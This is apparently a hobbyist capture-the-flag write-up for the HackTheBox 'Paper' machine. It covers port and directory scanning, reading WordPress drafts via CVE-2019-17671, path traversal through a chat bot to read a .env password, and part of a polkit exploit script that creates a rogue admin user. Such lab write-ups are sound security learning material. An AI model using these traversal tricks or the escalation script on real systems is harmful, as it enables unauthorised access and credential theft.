CTF Paper

  1. /etc/hosts
  2. rustscan
  3. nmap
  4. Directory listing
  5. sub domain listing
  6. Web
    1. php
  7. nmap
  8. gobuster
  9. telnet
  10. gobuster
  11. wpscan
  12. WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
  13. rocket chat
  14. Get user
  15. get root

/etc/hosts

echo "10.129.147.140 paper.htb" >> /etc/hosts

rustscan

rustscan -a paper.htb  --range 1-65000


PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack
80/tcp  open  http    syn-ack
443/tcp open  https   syn-ack

nmap

nmap -sV -p 80,443,22 paper.htb

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)

Apache outdated.

Directory listing

wfuzz --sc 200 -w Documents/wordlist/directory-list-2.3-medium.txt http://paper.htb/FUZZ

Nothing

sub domain listing

wfuzz -c -f sub-fighter -w Documents/wordlist/subdomains.lst -u 'http://paper.htb' -H "Host: FUZZ.paper.htb" --sc 200

Nothing

Web


Nothing in the source code.
Powered by centOS and apache

php

This is good, maybe I can read php files in this server

nmap

gobuster

gobuster dir -t 100 -x php -u http://paper.htb -w Documents/wordlist/directory-list-medium.txt

/manual (Status: 301) [Size: 232] [–> http://paper.htb/manual/]

gobuster dir -t 100 -x php -u http://paper.htb/manual -w Documents/wordlist/directory-list-medium.txt

/misc (Status: 301) [Size: 237] [–> http://paper.htb/manual/misc/]
/images (Status: 301) [Size: 239] [–> http://paper.htb/manual/images/]
/faq (Status: 301) [Size: 236] [–> http://paper.htb/manual/faq/]
/programs (Status: 301) [Size: 241] [–> http://paper.htb/manual/programs/]
/howto (Status: 301) [Size: 238] [–> http://paper.htb/manual/howto/]
/developer (Status: 301) [Size: 242] [–> http://paper.htb/manual/developer/]
/style (Status: 301) [Size: 238] [–> http://paper.htb/manual/style/]
/ssl (Status: 301) [Size: 236] [–> http://paper.htb/manual/ssl/]
/platform (Status: 301) [Size: 241] [–> http://paper.htb/manual/platform/]
/mod (Status: 301) [Size: 236] [–> http://paper.htb/manual/mod/]
/LICENSE (Status: 200) [Size: 11358]
/vhosts (Status: 301) [Size: 239] [–> http://paper.htb/manual/vhosts/]
/rewrite (Status: 301) [Size: 240] [–> http://paper.htb/manual/rewrite/]
/BUILDING (Status: 200) [Size: 102]

Nothing interesting

telnet

telnet paper.htb 80

Trying 10.129.147.140…
Connected to paper.htb.
Escape character is ‘^]’.
GET /../../../../../../../../../../../../../../../../../../../etc/apache2/apach2.conf HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Sat, 05 Feb 2022 21:39:40 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

So we have office.paper, I’m gonna add it to my /etc/hosts

Yesss!!!!!

gobuster

gobuster dir -t 100 -u http://office.paper -w Documents/wordlist/directory-list-medium.txt 

/wp-content (Status: 301) [Size: 239] [–> http://office.paper/wp-content/]
/manual (Status: 301) [Size: 235] [–> http://office.paper/manual/]
/wp-includes (Status: 301) [Size: 240] [–> http://office.paper/wp-includes/]
/wp-admin (Status: 301) [Size: 237] [–> http://office.paper/wp-admin/]

It will be easy, it’s a workpress weebsite.

And we have some potentiel user:
prisonmike
Jan
Michael
Nick


There is only one WP user.

wpscan

wpscan -e u vp vt dbe --url http://office.paper

The readme still here: http://office.paper/readme.html
WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
http://office.paper/index.php/wp-json/wp/v2/users/?per_page=100&page=1
We have 2 wp users:

nick and prisonmike

WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts

https://wpscan.com/vulnerability/9909
Proof of Concept for “Wordpress <=5.2.3: viewing unauthenticated posts” (CVE-2019-17671)
https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/


http://office.paper/?static=1

test
Micheal please remove the secret from drafts for gods sake!
Hello employees of Blunder Tiffin,
Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
So, I kindly request you all to take your discussions from the public blog to a more private chat system.
-Nick
# Warning for Michael
Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
Threat Level Midnight
A MOTION PICTURE SCREENPLAY,
WRITTEN AND DIRECTED BY
MICHAEL SCOTT
[INT:DAY]
Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
# Secret Registration URL of new Employee chat system
http://chat.office.paper/register/8qozr226AhkCHZdyY
# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
# Also, stop looking at my drafts. Jeez!

I have an another link, I have to add chat.office.paper to my hosts file.
http://chat.office.paper/register/8qozr226AhkCHZdyY

rocket chat

This CTF is so fun :D
NOOO, GOD! NO, GOD, PLEASE, NO! NO! NO!

I have something to do with the bot.

I can’t upload files in the chat with the bot.

This is interesting.

recyclops list sale

-rw-r–r– 1 dwight dwight 158 Sep 15 13:03 portfolio.txt

recyclops list ../../../home/

total 0
drwxr-xr-x. 3 root root 20 Jan 14 06:50 .
dr-xr-xr-x. 17 root root 244 Jan 17 11:37 ..
drwx—— 11 dwight dwight 294 Feb 5 14:46 dwight

Maybe I can start an another command with ;
Ahahahah!!!!
Stop injecting OS commands!

Maybe I can fetch the wp-config.php
3. Files:
eg: ‘recyclops get me the file test.txt’, or ‘recyclops could you send me the file src/test.php’ or just ‘recyclops file test.txt’


Get user

recyclops file ../../../home/dwight/hubot/.env
export ROCKETCHAT_PASSWORD=Queenofblad3s!23

I have to try this password with the user of the box.
recyclops list ../../../home/
total 8
drwxr-xr-x. 3 root root 20 Jan 14 06:50 .
dr-xr-xr-x. 17 root root 244 Jan 17 11:37 ..
drwx—— 13 dwight dwight 4096 Feb 6 04:10 dwight

ssh dwight@paper.htb

get root

In the dwight home we have a pk.sh file.

#!/bin/bash

# Set the name and display name
userName="hacked"
realName="hacked"

# Set the account as an administrator
accountType=1

# Set the password hash for 'password' and password hint
password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
passHint="password"

# Check Polkit version
polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9)
if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then
    echo "[*] Vulnerable version of polkit found"
else
    echo "[!] WARNING: Version of polkit might not vulnerable"
fi

It will create a new user, hacked:password.
He is checking the version of polkit too.
I don’t put all the code, it’s too long, you have to see it yourself.

./pk.sh

Oh!!! pk is for polkit I got it now, but I don’t know why my pol.py don’t work, I’m using this exploit too.

It was a cool box, I was a bit stuck at the beginning because I didn’t saw office.paper.htb
The bot was fun, you can do it in some python or bash bots on discord or IRC.